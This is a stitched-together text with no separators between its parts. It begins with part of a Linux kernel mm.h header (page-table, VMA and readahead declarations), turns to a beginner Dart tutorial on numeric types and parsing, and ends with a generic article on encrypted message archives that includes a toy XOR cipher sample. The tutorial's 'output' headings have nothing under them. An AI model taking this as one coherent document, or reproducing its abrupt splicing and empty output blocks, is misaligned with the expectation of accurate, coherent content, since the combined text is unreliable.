#define VM_FAULT_HWPOISON 0x0010	/* Hit poisoned page */

#define VM_FAULT_NOPAGE	0x0100	/* ->fault installed the pte, not return page */
#define VM_FAULT_LOCKED	0x0200	/* ->fault locked the returned page */

#define VM_FAULT_ERROR	(VM_FAULT_OOM | VM_FAULT_SIGBUS | VM_FAULT_HWPOISON)

/*
 * Can be called by the pagefault handler when it gets a VM_FAULT_OOM.
 */
extern void pagefault_out_of_memory(void);

#define offset_in_page(p)	((unsigned long)(p) & ~PAGE_MASK)

extern void show_free_areas(void);

int shmem_lock(struct file *file, int lock, struct user_struct *user);
struct file *shmem_file_setup(const char *name, loff_t size, unsigned long flags);
int shmem_zero_setup(struct vm_area_struct *);

#ifndef CONFIG_MMU
extern unsigned long shmem_get_unmapped_area(struct file *file,
					     unsigned long addr,
					     unsigned long len,
					     unsigned long pgoff,
					     unsigned long flags);
#endif

extern int can_do_mlock(void);
extern int user_shm_lock(size_t, struct user_struct *);
extern void user_shm_unlock(size_t, struct user_struct *);

/*
 * Parameter block passed down to zap_pte_range in exceptional cases.
 */
struct zap_details {
	struct vm_area_struct *nonlinear_vma;	/* Check page->index if set */
	struct address_space *check_mapping;	/* Check page->mapping if set */
	pgoff_t	first_index;			/* Lowest page->index to unmap */
	pgoff_t last_index;			/* Highest page->index to unmap */
	spinlock_t *i_mmap_lock;		/* For unmap_mapping_range: */
	unsigned long truncate_count;		/* Compare vm_truncate_count */
};

struct page *vm_normal_page(struct vm_area_struct *vma, unsigned long addr,
		pte_t pte);

int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
		unsigned long size);
unsigned long zap_page_range(struct vm_area_struct *vma, unsigned long address,
		unsigned long size, struct zap_details *);
unsigned long unmap_vmas(struct mmu_gather **tlb,
		struct vm_area_struct *start_vma, unsigned long start_addr,
		unsigned long end_addr, unsigned long *nr_accounted,
		struct zap_details *);

/**
 * mm_walk - callbacks for walk_page_range
 * @pgd_entry: if set, called for each non-empty PGD (top-level) entry
 * @pud_entry: if set, called for each non-empty PUD (2nd-level) entry
 * @pmd_entry: if set, called for each non-empty PMD (3rd-level) entry
 * @pte_entry: if set, called for each non-empty PTE (4th-level) entry
 * @pte_hole: if set, called for each hole at all levels
 *
 * (see walk_page_range for more details)
 */
struct mm_walk {
	int (*pgd_entry)(pgd_t *, unsigned long, unsigned long, struct mm_walk *);
	int (*pud_entry)(pud_t *, unsigned long, unsigned long, struct mm_walk *);
	int (*pmd_entry)(pmd_t *, unsigned long, unsigned long, struct mm_walk *);
	int (*pte_entry)(pte_t *, unsigned long, unsigned long, struct mm_walk *);
	int (*pte_hole)(unsigned long, unsigned long, struct mm_walk *);
	struct mm_struct *mm;
	void *private;
};

int walk_page_range(unsigned long addr, unsigned long end,
		struct mm_walk *walk);
void free_pgd_range(struct mmu_gather *tlb, unsigned long addr,
		unsigned long end, unsigned long floor, unsigned long ceiling);
int copy_page_range(struct mm_struct *dst, struct mm_struct *src,
			struct vm_area_struct *vma);
void unmap_mapping_range(struct address_space *mapping,
		loff_t const holebegin, loff_t const holelen, int even_cows);
int follow_pfn(struct vm_area_struct *vma, unsigned long address,
	unsigned long *pfn);
int follow_phys(struct vm_area_struct *vma, unsigned long address,
		unsigned int flags, unsigned long *prot, resource_size_t *phys);
int generic_access_phys(struct vm_area_struct *vma, unsigned long addr,
			void *buf, int len, int write);

static inline void unmap_shared_mapping_range(struct address_space *mapping,
		loff_t const holebegin, loff_t const holelen)
{
	unmap_mapping_range(mapping, holebegin, holelen, 0);
}

extern void truncate_pagecache(struct inode *inode, loff_t old, loff_t new);
extern int vmtruncate(struct inode *inode, loff_t offset);
extern int vmtruncate_range(struct inode *inode, loff_t offset, loff_t end);

int truncate_inode_page(struct address_space *mapping, struct page *page);
int generic_error_remove_page(struct address_space *mapping, struct page *page);

int invalidate_inode_page(struct page *page);

#ifdef CONFIG_MMU
extern int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
			unsigned long address, unsigned int flags);
#else
static inline int handle_mm_fault(struct mm_struct *mm,
			struct vm_area_struct *vma, unsigned long address,
			unsigned int flags)
{
	/* should never happen if there's no MMU */
	BUG();
	return VM_FAULT_SIGBUS;
}
#endif

extern int make_pages_present(unsigned long addr, unsigned long end);
extern int access_process_vm(struct task_struct *tsk, unsigned long addr,
			void *buf, int len, int write);

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
			unsigned long start, int nr_pages, int write, int force,
			struct page **pages, struct vm_area_struct **vmas);
int get_user_pages_fast(unsigned long start, int nr_pages, int write,
			struct page **pages);
struct page *get_dump_page(unsigned long addr);

extern int try_to_release_page(struct page * page, gfp_t gfp_mask);
extern void do_invalidatepage(struct page *page, unsigned long offset);

int __set_page_dirty_nobuffers(struct page *page);
int __set_page_dirty_no_writeback(struct page *page);
int redirty_page_for_writepage(struct writeback_control *wbc,
				struct page *page);
void account_page_dirtied(struct page *page, struct address_space *mapping);
int set_page_dirty(struct page *page);
int set_page_dirty_lock(struct page *page);
int clear_page_dirty_for_io(struct page *page);

extern unsigned long move_page_tables(struct vm_area_struct *vma,
		unsigned long old_addr, struct vm_area_struct *new_vma,
		unsigned long new_addr, unsigned long len);
extern unsigned long do_mremap(unsigned long addr,
			       unsigned long old_len, unsigned long new_len,
			       unsigned long flags, unsigned long new_addr);
extern int mprotect_fixup(struct vm_area_struct *vma,
			  struct vm_area_struct **pprev, unsigned long start,
			  unsigned long end, unsigned long newflags);

/*
 * doesn't attempt to fault and will return short.
 */
int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
			  struct page **pages);

/*
 * A callback you can register to apply pressure to ageable caches.
 *
 * 'shrink' is passed a count 'nr_to_scan' and a 'gfpmask'.  It should
 * look through the least-recently-used 'nr_to_scan' entries and
 * attempt to free them up.  It should return the number of objects
 * which remain in the cache.  If it returns -1, it means it cannot do
 * any scanning at this time (eg. there is a risk of deadlock).
 *
 * The 'gfpmask' refers to the allocation we are currently trying to
 * fulfil.
 *
 * Note that 'shrink' will be passed nr_to_scan == 0 when the VM is
 * querying the cache size, so a fastpath for that case is appropriate.
 */
struct shrinker {
	int (*shrink)(int nr_to_scan, gfp_t gfp_mask);
	int seeks;	/* seeks to recreate an obj */

	/* These are for internal use */
	struct list_head list;
	long nr;	/* objs pending delete */
};
#define DEFAULT_SEEKS 2 /* A good number if you don't know better. */
extern void register_shrinker(struct shrinker *);
extern void unregister_shrinker(struct shrinker *);

int vma_wants_writenotify(struct vm_area_struct *vma);

extern pte_t *get_locked_pte(struct mm_struct *mm, unsigned long addr, spinlock_t **ptl);

#ifdef __PAGETABLE_PUD_FOLDED
static inline int __pud_alloc(struct mm_struct *mm, pgd_t *pgd,
						unsigned long address)
{
	return 0;
}
#else
int __pud_alloc(struct mm_struct *mm, pgd_t *pgd, unsigned long address);
#endif

#ifdef __PAGETABLE_PMD_FOLDED
static inline int __pmd_alloc(struct mm_struct *mm, pud_t *pud,
						unsigned long address)
{
	return 0;
}
#else
int __pmd_alloc(struct mm_struct *mm, pud_t *pud, unsigned long address);
#endif

int __pte_alloc(struct mm_struct *mm, pmd_t *pmd, unsigned long address);
int __pte_alloc_kernel(pmd_t *pmd, unsigned long address);

/*
 * The following ifdef needed to get the 4level-fixup.h header to work.
 * Remove it when 4level-fixup.h has been removed.
 */
#if defined(CONFIG_MMU) && !defined(__ARCH_HAS_4LEVEL_HACK)
static inline pud_t *pud_alloc(struct mm_struct *mm, pgd_t *pgd, unsigned long address)
{
	return (unlikely(pgd_none(*pgd)) && __pud_alloc(mm, pgd, address))?
		NULL: pud_offset(pgd, address);
}

static inline pmd_t *pmd_alloc(struct mm_struct *mm, pud_t *pud, unsigned long address)
{
	return (unlikely(pud_none(*pud)) && __pmd_alloc(mm, pud, address))?
		NULL: pmd_offset(pud, address);
}
#endif /* CONFIG_MMU && !__ARCH_HAS_4LEVEL_HACK */

#if USE_SPLIT_PTLOCKS
/*
 * We tuck a spinlock to guard each pagetable page into its struct page,
 * at page->private, with BUILD_BUG_ON to make sure that this will not
 * overflow into the next struct page (as it might with DEBUG_SPINLOCK).
 * When freeing, reset page->mapping so free_pages_check won't complain.
 */
#define __pte_lockptr(page)	&((page)->ptl)
#define pte_lock_init(_page)	do {					\
	spin_lock_init(__pte_lockptr(_page));				\
} while (0)
#define pte_lock_deinit(page)	((page)->mapping = NULL)
#define pte_lockptr(mm, pmd)	({(void)(mm); __pte_lockptr(pmd_page(*(pmd)));})
#else	/* !USE_SPLIT_PTLOCKS */
/*
 * We use mm->page_table_lock to guard all pagetable pages of the mm.
 */
#define pte_lock_init(page)	do {} while (0)
#define pte_lock_deinit(page)	do {} while (0)
#define pte_lockptr(mm, pmd)	({(void)(pmd); &(mm)->page_table_lock;})
#endif /* USE_SPLIT_PTLOCKS */

static inline void pgtable_page_ctor(struct page *page)
{
	pte_lock_init(page);
	inc_zone_page_state(page, NR_PAGETABLE);
}

static inline void pgtable_page_dtor(struct page *page)
{
	pte_lock_deinit(page);
	dec_zone_page_state(page, NR_PAGETABLE);
}

#define pte_offset_map_lock(mm, pmd, address, ptlp)	\
({							\
	spinlock_t *__ptl = pte_lockptr(mm, pmd);	\
	pte_t *__pte = pte_offset_map(pmd, address);	\
	*(ptlp) = __ptl;				\
	spin_lock(__ptl);				\
	__pte;						\
})

#define pte_unmap_unlock(pte, ptl)	do {		\
	spin_unlock(ptl);				\
	pte_unmap(pte);					\
} while (0)

#define pte_alloc_map(mm, pmd, address)			\
	((unlikely(!pmd_present(*(pmd))) && __pte_alloc(mm, pmd, address))? \
		NULL: pte_offset_map(pmd, address))

#define pte_alloc_map_lock(mm, pmd, address, ptlp)	\
	((unlikely(!pmd_present(*(pmd))) && __pte_alloc(mm, pmd, address))? \
		NULL: pte_offset_map_lock(mm, pmd, address, ptlp))

#define pte_alloc_kernel(pmd, address)			\
	((unlikely(!pmd_present(*(pmd))) && __pte_alloc_kernel(pmd, address))? \
		NULL: pte_offset_kernel(pmd, address))

extern void free_area_init(unsigned long * zones_size);
extern void free_area_init_node(int nid, unsigned long * zones_size,
		unsigned long zone_start_pfn, unsigned long *zholes_size);
#ifdef CONFIG_ARCH_POPULATES_NODE_MAP
/*
 * With CONFIG_ARCH_POPULATES_NODE_MAP set, an architecture may initialise its
 * zones, allocate the backing mem_map and account for memory holes in a more
 * architecture independent manner. This is a substitute for creating the
 * zone_sizes[] and zholes_size[] arrays and passing them to
 * free_area_init_node()
 *
 * An architecture is expected to register range of page frames backed by
 * physical memory with add_active_range() before calling
 * free_area_init_nodes() passing in the PFN each zone ends at. At a basic
 * usage, an architecture is expected to do something like
 *
 * unsigned long max_zone_pfns[MAX_NR_ZONES] = {max_dma, max_normal_pfn,
 * 							 max_highmem_pfn};
 * for_each_valid_physical_page_range()
 * 	add_active_range(node_id, start_pfn, end_pfn)
 * free_area_init_nodes(max_zone_pfns);
 *
 * If the architecture guarantees that there are no holes in the ranges
 * registered with add_active_range(), free_bootmem_active_regions()
 * will call free_bootmem_node() for each registered physical page range.
 * Similarly sparse_memory_present_with_active_regions() calls
 * memory_present() for each range when SPARSEMEM is enabled.
 *
 * See mm/page_alloc.c for more information on each function exposed by
 * CONFIG_ARCH_POPULATES_NODE_MAP
 */
extern void free_area_init_nodes(unsigned long *max_zone_pfn);
extern void add_active_range(unsigned int nid, unsigned long start_pfn,
					unsigned long end_pfn);
extern void remove_active_range(unsigned int nid, unsigned long start_pfn,
					unsigned long end_pfn);
extern void remove_all_active_ranges(void);
extern unsigned long absent_pages_in_range(unsigned long start_pfn,
						unsigned long end_pfn);
extern void get_pfn_range_for_nid(unsigned int nid,
			unsigned long *start_pfn, unsigned long *end_pfn);
extern unsigned long find_min_pfn_with_active_regions(void);
extern void free_bootmem_with_active_regions(int nid,
						unsigned long max_low_pfn);
typedef int (*work_fn_t)(unsigned long, unsigned long, void *);
extern void work_with_active_regions(int nid, work_fn_t work_fn, void *data);
extern void sparse_memory_present_with_active_regions(int nid);
#endif /* CONFIG_ARCH_POPULATES_NODE_MAP */

#if !defined(CONFIG_ARCH_POPULATES_NODE_MAP) && \
    !defined(CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID)
static inline int __early_pfn_to_nid(unsigned long pfn)
{
	return 0;
}
#else
/* please see mm/page_alloc.c */
extern int __meminit early_pfn_to_nid(unsigned long pfn);
#ifdef CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
/* there is a per-arch backend function. */
extern int __meminit __early_pfn_to_nid(unsigned long pfn);
#endif /* CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID */
#endif

extern void set_dma_reserve(unsigned long new_dma_reserve);
extern void memmap_init_zone(unsigned long, int, unsigned long,
				unsigned long, enum memmap_context);
extern void setup_per_zone_wmarks(void);
extern void calculate_zone_inactive_ratio(struct zone *zone);
extern void mem_init(void);
extern void __init mmap_init(void);
extern void show_mem(void);
extern void si_meminfo(struct sysinfo * val);
extern void si_meminfo_node(struct sysinfo *val, int nid);
extern int after_bootmem;

#ifdef CONFIG_NUMA
extern void setup_per_cpu_pageset(void);
#else
static inline void setup_per_cpu_pageset(void) {}
#endif

extern void zone_pcp_update(struct zone *zone);

/* nommu.c */
extern atomic_long_t mmap_pages_allocated;

/* prio_tree.c */
void vma_prio_tree_add(struct vm_area_struct *, struct vm_area_struct *old);
void vma_prio_tree_insert(struct vm_area_struct *, struct prio_tree_root *);
void vma_prio_tree_remove(struct vm_area_struct *, struct prio_tree_root *);
struct vm_area_struct *vma_prio_tree_next(struct vm_area_struct *vma,
	struct prio_tree_iter *iter);

#define vma_prio_tree_foreach(vma, iter, root, begin, end)	\
	for (prio_tree_iter_init(iter, root, begin, end), vma = NULL;	\
		(vma = vma_prio_tree_next(vma, iter)); )

static inline void vma_nonlinear_insert(struct vm_area_struct *vma,
					struct list_head *list)
{
	vma->shared.vm_set.parent = NULL;
	list_add_tail(&vma->shared.vm_set.list, list);
}

/* mmap.c */
extern int __vm_enough_memory(struct mm_struct *mm, long pages, int cap_sys_admin);
extern void vma_adjust(struct vm_area_struct *vma, unsigned long start,
	unsigned long end, pgoff_t pgoff, struct vm_area_struct *insert);
extern struct vm_area_struct *vma_merge(struct mm_struct *,
	struct vm_area_struct *prev, unsigned long addr, unsigned long end,
	unsigned long vm_flags, struct anon_vma *, struct file *, pgoff_t,
	struct mempolicy *);
extern struct anon_vma *find_mergeable_anon_vma(struct vm_area_struct *);
extern int split_vma(struct mm_struct *,
	struct vm_area_struct *, unsigned long addr, int new_below);
extern int insert_vm_struct(struct mm_struct *, struct vm_area_struct *);
extern void __vma_link_rb(struct mm_struct *, struct vm_area_struct *,
	struct rb_node **, struct rb_node *);
extern void unlink_file_vma(struct vm_area_struct *);
extern struct vm_area_struct *copy_vma(struct vm_area_struct **,
	unsigned long addr, unsigned long len, pgoff_t pgoff);
extern void exit_mmap(struct mm_struct *);

extern int mm_take_all_locks(struct mm_struct *mm);
extern void mm_drop_all_locks(struct mm_struct *mm);

#ifdef CONFIG_PROC_FS
/* From fs/proc/base.c. callers must _not_ hold the mm's exe_file_lock */
extern void added_exe_file_vma(struct mm_struct *mm);
extern void removed_exe_file_vma(struct mm_struct *mm);
#else
static inline void added_exe_file_vma(struct mm_struct *mm)
{}

static inline void removed_exe_file_vma(struct mm_struct *mm)
{}
#endif /* CONFIG_PROC_FS */

extern int may_expand_vm(struct mm_struct *mm, unsigned long npages);
extern int install_special_mapping(struct mm_struct *mm,
				   unsigned long addr, unsigned long len,
				   unsigned long flags, struct page **pages);

extern unsigned long get_unmapped_area(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);

extern unsigned long do_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff);
extern unsigned long mmap_region(struct file *file, unsigned long addr,
	unsigned long len, unsigned long flags,
	unsigned int vm_flags, unsigned long pgoff);

static inline unsigned long do_mmap(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long offset)
{
	unsigned long ret = -EINVAL;
	if ((offset + PAGE_ALIGN(len)) < offset)
		goto out;
	if (!(offset & ~PAGE_MASK))
		ret = do_mmap_pgoff(file, addr, len, prot, flag, offset >> PAGE_SHIFT);
out:
	return ret;
}

extern int do_munmap(struct mm_struct *, unsigned long, size_t);

extern unsigned long do_brk(unsigned long, unsigned long);

/* filemap.c */
extern unsigned long page_unuse(struct page *);
extern void truncate_inode_pages(struct address_space *, loff_t);
extern void truncate_inode_pages_range(struct address_space *,
				       loff_t lstart, loff_t lend);

/* generic vm_area_ops exported for stackable file systems */
extern int filemap_fault(struct vm_area_struct *, struct vm_fault *);

/* mm/page-writeback.c */
int write_one_page(struct page *page, int wait);
void task_dirty_inc(struct task_struct *tsk);

/* readahead.c */
#define VM_MAX_READAHEAD	128	/* kbytes */
#define VM_MIN_READAHEAD	16	/* kbytes (includes current page) */

int force_page_cache_readahead(struct address_space *mapping, struct file *filp,
			pgoff_t offset, unsigned long nr_to_read);

void page_cache_sync_readahead(struct address_space *mapping,
			       struct file_ra_state *ra,
			       struct file *filp,
			       pgoff_t offset,
			       unsigned long size);

void page_cache_async_readahead(struct address_space *mapping,
				struct file_ra_state *ra,
				struct file *filp,
				struct page *pg,
				pgoff_t offset,
				unsigned long size);

unsigned long max_sane_readahead(unsigned long nr);
unsigned long ra_submit(struct file_ra_state *ra,
			struct address_space *mapping,
			struct file *filp);

/* Do stack extension */
extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
#ifdef CONFIG_IA64
extern int expand_upwards(struct vm_area_struct *vma, unsigned long address);
#endif
extern int expand_stack_downwards(struct vm_area_struct *vma,
				  unsigned long address);

/* Look up the first VMA which satisfies  addr < vm_end,  NULL if none. */
extern struct vm_area_struct * find_vma(struct mm_struct * mm, unsigned long addr);
extern struct vm_area_struct * find_vma_prev(struct mm_struct * mm, unsigned long addr,
					     struct vm_area_struct **pprev);

/* Look up the first VMA which intersects the interval start_addr..end_addr-1,
   NULL if none.  Assume start_addr < end_addr. */
static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * mm, unsigned long start_addr, unsigned long end_addr)
{
	struct vm_area_struct * vma = find_vma(mm,start_addr);

	if (vma && end_addr <= vma->vm_start)
		vma = NULL;
	return vma;
}

static inline unsigned long vma_pages(struct vm_area_struct *vma)
{
	return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
}

pgprot_t vm_get_page_prot(unsigned long vm_flags);
struct vm_area_struct *find_extend_vma(struct mm_struct *, unsigned long addr);
int remap_pfn_range(struct vm_area_struct *, unsigned long addr,
			unsigned long pfn, unsigned long size, pgprot_t);
int vm_insert_page(struct vm_area_struct *, unsigned long addr, struct page *);
int vm_insert_pfn(struct vm_area_struct *vma, unsigned long addr,
			unsigned long pfn);
int vm_insert_mixed(struct vm_area_struct *vma, unsigned long addr,
			unsigned long pfn);

struct page *follow_page(struct vm_area_struct *, unsigned long address,
			unsigned int foll_flags);
#define FOLL_WRITE	0x01	/* check pte is writable */
#define FOLL_TOUCH	0x02	/* mark page accessed */
#define FOLL_GET	0x04	/* do get_page on page */
#define FOLL_DUMP	0x08	/* give error on hole if it would be zero */
#define FOLL_FORCE	0x10	/* get_user_pages read/write w/o permission */

typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
			void *data);
extern int apply_to_page_range(struct mm_struct *mm, unsigned long address,
			       unsigned long size, pte_fn_t fn, void *data);

#ifdef CONFIG_PROC_FS
void vm_stat_account(struct mm_struct *, unsigned long, struct file *, long);
#else
static inline void vm_stat_account(struct mm_struct *mm,
			unsigned long flags, struct file *file, long pages)
{
}
#endif /* CONFIG_PROC_FS */

#ifdef CONFIG_DEBUG_PAGEALLOC
extern int debug_pagealloc_enabled;
extern void kernel_map_pages(struct page *page, int numpages, int enable);

static inline void enable_debug_pagealloc(void)
{
	debug_pagealloc_enabled = 1;
}
#ifdef CONFIG_HIBERNATION
extern bool kernel_page_present(struct page *page);
#endif /* CONFIG_HIBERNATION */
#else
static inline void
kernel_map_pages(struct page *page, int numpages, int enable) {}
static inline void enable_debug_pagealloc(void)
{
}
#ifdef CONFIG_HIBERNATION
static inline bool kernel_page_present(struct page *page) { return true; }
#endif /* CONFIG_HIBERNATION */
#endif

extern struct vm_area_struct *get_gate_vma(struct task_struct *tsk);
#ifdef __HAVE_ARCH_GATE_AREA
int in_gate_area_no_task(unsigned long addr);
int in_gate_area(struct task_struct *task, unsigned long addr);
#else
int in_gate_area_no_task(unsigned long addr);
#define in_gate_area(task, addr) ({(void)task; in_gate_area_no_task(addr);})
#endif	/* __HAVE_ARCH_GATE_AREA */

int drop_caches_sysctl_handler(struct ctl_table *, int,
					void __user *, size_t *, loff_t *);
unsigned long shrink_slab(unsigned long scanned, gfp_t gfp_mask,
			unsigned long lru_pages);

#ifndef CONFIG_MMU
#define randomize_va_space 0
#else
extern int randomize_va_space;
#endif

const char * arch_vma_name(struct vm_area_struct *vma);
void print_vma_addr(char *prefix, unsigned long rip);

struct page *sparse_mem_map_populate(unsigned long pnum, int nid);
pgd_t *vmemmap_pgd_populate(unsigned long addr, int node);
pud_t *vmemmap_pud_populate(pgd_t *pgd, unsigned long addr, int node);
pmd_t *vmemmap_pmd_populate(pud_t *pud, unsigned long addr, int node);
pte_t *vmemmap_pte_populate(pmd_t *pmd, unsigned long addr, int node);
void *vmemmap_alloc_block(unsigned long size, int node);
void vmemmap_verify(pte_t *, int, unsigned long, unsigned long);
int vmemmap_populate_basepages(struct page *start_page,
						unsigned long pages, int node);
int vmemmap_populate(struct page *start_page, unsigned long pages, int node);
void vmemmap_populate_print_last(void);

extern int account_locked_memory(struct mm_struct *mm, struct rlimit *rlim,
				 size_t size);
extern void refund_locked_memory(struct mm_struct *mm, size_t size);

extern void memory_failure(unsigned long pfn, int trapno);
extern int __memory_failure(unsigned long pfn, int trapno, int ref);
extern int sysctl_memory_failure_early_kill;
extern int sysctl_memory_failure_recovery;
extern atomic_long_t mce_bad_pages;

#endif /* __KERNEL__ */
#endif /* _LINUX_MM_H */
Keywords are pre-defined reserved words that have a special meaning to the compiler. There are 61 keywords available in the Dart language. Some of them are: if, else, while, for, extends, abstract, etc.

Data types

Data types in the Dart language form an extensive system that we use to declare variables and functions in a program. Based on the type of a variable, we can determine the space it occupies in storage and the way in which the stored bit pattern will be interpreted. In short, a data type specifies the type of data that a variable can store. Examples of static data types in Dart: Numbers (int, double), Strings, Booleans, etc.

Numbers

Dart numbers come in two flavours: int and double.

Integer (int)

Integer values no larger than 64 bits, depending on the platform. On native platforms, values can be from -2^63 to 2^63 - 1. On the web, integer values are represented as JavaScript numbers (64-bit floating-point values with no fractional part) and can be from -2^53 to 2^53 - 1.

double

64-bit (double-precision) floating-point numbers, as specified by the IEEE 754 standard.

Both int and double are subtypes of num. The num type includes basic operators such as +, -, /, and *, and is also where you'll find abs(), ceil(), and floor(), among other methods. (Bitwise operators, such as >>, are defined in the int class.) If num and its subtypes don't have what you're looking for, the dart:math library might.

Code 1:

void main(){
  // integer variable 'a' initialized with value 10
  int a=10;
  print(a);
  print(a.runtimeType);
  // double variable 'b' initialized with value 20.3
  double b=20.3;
  print(b);
  print(b.runtimeType);
}

output

Typecasting

Type casting is a way of converting data from one data type to another. This process of data conversion is also known as type conversion or type coercion. Let's see some examples of changing a variable's value from one data type to another.

Note: the Dart Object type has a .runtimeType instance member (present since at least dart-sdk v1.14, don't know if it was available earlier); to check any variable's data type at runtime, you need to use .runtimeType.

You can also declare a variable as a num. If you do this, the variable can contain both integer and double values. Let's see the code below...

Code 2:

void main() {
  num a = 2;
  print('a is $a');
  print(a.runtimeType);
  a = 90.8;
  print('a is $a');
  print(a.runtimeType);
}

output

** remember: in the code above, you can see that variable 'a' changed its data type from int to double.

Now let's convert a string into an integer [another typecasting example].

Code 3: the .parse() function helps to convert a String to an int/double.
void main() {
  // string '23' will be converted into integer 23 using the .parse() function
  int a = int.parse('23');
  print('a is $a');
  print('variable a type is ');
  print(a.runtimeType);
}

output

Let's see another example of typecasting, string -> integer.

Code 4:

void main() {
  String age = '23';
  print('age is $age');
  print('age variable type ');
  print(age.runtimeType);

  // variable age passed to the function .parse()
  int a = int.parse(age);
  print('a is $a');
  print('variable a type is ');
  print(a.runtimeType);
}

output

Now let's convert a string into a double (string->double).

Code 5:

void main(){
  String val='20.3';
  print('String val is: $val');
  print('val variable data-type: ');
  print(val.runtimeType);

  // typecasting string->double
  double amnt=double.parse(val);
  print('amnt is $amnt');
  print('amnt variable data-type: ');
  print(amnt.runtimeType);
}

output

Now, let's convert integer/double valued variables into strings. Note: for this we need to use the .toString() function/method.

Code 6:

void main(){
  int a=10;
  print('a is: $a');
  print(a.runtimeType);
  // typecasting int->string with .toString()
  String b=a.toString();
  print('b is: $b');
  print(b.runtimeType);
}

output

Code 7: converts a double into a string

void main(){
  double a=23.45;
  print('a is: $a');
  print(a.runtimeType);

  // double->string .toString()
  String df=a.toString();
  print('String df is: $df');
  print(df.runtimeType);
}

output

Write code to print every variable with its respective data type: integer, double, String, bool.

Code 8:

void main(){
  // integer variable 'a' with stored value '10'
  int a=10;
  print('a is: $a');
  print('variable A data type: ');
  print(a.runtimeType);
  // double variable 'b' with stored value '10.1'
  double b=10.1;
  print('b is: $b');
  print('variable B data type: ');
  print(b.runtimeType);
  // String variable 'c' with stored value 'microcodes'
  String c="microcodes";
  print('c is: $c');
  print('variable C data type: ');
  print(c.runtimeType);
  // boolean variable 'd' with stored value 'true'
  bool d=true;
  print('d is: $d');
  d=false;
  print('d is: $d');
  print('variable D data type: ');
  print(d.runtimeType);
}

output
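As one more quick example, the num methods mentioned earlier (abs(), ceil(), and floor()) work on both int and double values. A minimal sketch, using only standard dart:core num members:

Code 9:

void main() {
  num n = -7.6;
  print(n.abs());   // 7.6
  print(n.ceil());  // -7 (rounds up)
  print(n.floor()); // -8 (rounds down)
}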
Message Archives

Storage of messages for later use. This becomes a particular issue when the messages contain sensitive information and need keys to be decrypted.

Message archives refer to the organized storage of messages for future reference or use. This practice is essential in various fields, from business communications to personal data management.

The Importance of Message Archives

Archiving messages ensures that important information is not lost and can be retrieved when needed. It becomes particularly critical when these messages contain sensitive information.

• Sensitive Information: Messages might include confidential details such as financial data, personal identification information (PII), or proprietary business insights.
• Security Measures: To protect this sensitive information, encryption is often used. Encryption transforms readable data into a coded format that can only be deciphered with a key.

The Role of Encryption Keys in Message Archives

The security of archived messages relies heavily on encryption keys. Here's why they are crucial:

1. Data Protection: Encryption keys ensure that only authorized individuals can access the content of the archived messages by decrypting them back into their original form.
2. Avoiding Unauthorized Access: Without the appropriate decryption key, even if someone gains access to the archives, they will not be able to read the encrypted messages.

Pitfalls and Best Practices for Managing Message Archives with Sensitive Information

• Avoid Key Loss: Losing an encryption key means losing access to all encrypted data. Always have secure backups for your keys.
• Password Protection: Ensure that your decryption keys themselves are protected with strong passwords and stored securely.
• User Access Control: Limit who has access to both message archives and their corresponding decryption keys.
• Regular Audits: Conduct regular audits on your message archive system's security protocols and practices.
• Compliance: Follow industry standards and legal requirements regarding data protection and archiving practices.

The Future of Message Archiving Technology

As technology evolves, so do methods for securing archived messages. Expect advancements in areas like quantum cryptography, enhanced AI-driven security measures, and more robust compliance frameworks.

In conclusion, properly managing message archives, especially those containing sensitive information, requires careful consideration of encryption techniques, key management, and overall security practices. By following best practices you can ensure that your valuable communication remains safe over time.

Advantages of Message Archives:

• Improved Communication: Access to past conversations provides context and clarity for future interactions.
• Accountability and Compliance: Archived messages can be crucial for audits, legal proceedings, or internal investigations.
• Knowledge Management: Preserves valuable information and institutional knowledge shared through messages.

Disadvantages of Message Archives:

• Security Risks: Storing sensitive data in message archives requires robust security measures to prevent unauthorized access and data breaches.
• Storage Costs: Maintaining extensive message archives can lead to high storage costs and require complex data management systems.
• Privacy Concerns: Archived messages may contain personal or confidential information, raising privacy concerns if not handled properly.

Message Archives in Various Areas:

Message archives play a vital role in various sectors:

1.
Financial Institutions: Retaining financial transaction records and client communications is crucial for compliance and fraud prevention. 2. Healthcare: Secure storage of patient records and communication ensures continuity of care and legal protection. 3. Government: Archiving official communications is essential for transparency, accountability, and historical preservation. Imagine this: you’re emailing with your bank about a sensitive financial matter, or perhaps you’re texting with your doctor about a personal health concern. You wouldn’t want those conversations just floating around in cyberspace forever, would you? That’s where message archives come in. Just like you might store important documents in a secure file cabinet, message archives provide a dedicated storage space for your digital communications. This ensures that: • Important information is readily accessible: Need to reference a past conversation? No problem! Your message archive keeps everything organized and within reach. • Sensitive data stays protected: Message archives often employ encryption, acting like a digital lock and key to safeguard your confidential information. Think of it like this: 1. You send a message containing your credit card details to make an online purchase. 2. The message is encrypted, like sealing it in an envelope that only you and the recipient have the key to open. 3. This encrypted message is then stored securely in a message archive, protected from unauthorized access. So, whether it’s personal messages, financial transactions, or confidential business dealings, message archives provide the peace of mind that comes with knowing your conversations are safe, secure, and always available when you need them.
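To make the "encrypt, archive, decrypt with the key" cycle described above concrete, here is a minimal sketch in Dart. The XOR keystream is a deliberately simplified stand-in used for illustration only (it is NOT secure); a real archive would use a vetted cipher such as AES-GCM together with proper key management, and the key and message below are purely hypothetical.

import 'dart:convert';

// Toy XOR "cipher" -- illustration only, never use for real security.
List<int> xorWithKey(List<int> data, List<int> key) =>
    [for (var i = 0; i < data.length; i++) data[i] ^ key[i % key.length]];

void main() {
  final key = utf8.encode('archive-demo-key');     // hypothetical key
  final message = utf8.encode('Card ending 1234'); // sensitive message

  // What the archive stores: unreadable without the key.
  final archived = xorWithKey(message, key);
  print('archived: ${base64.encode(archived)}');

  // Applying the same key restores the original message.
  final restored = utf8.decode(xorWithKey(archived, key));
  print('restored: $restored');
}

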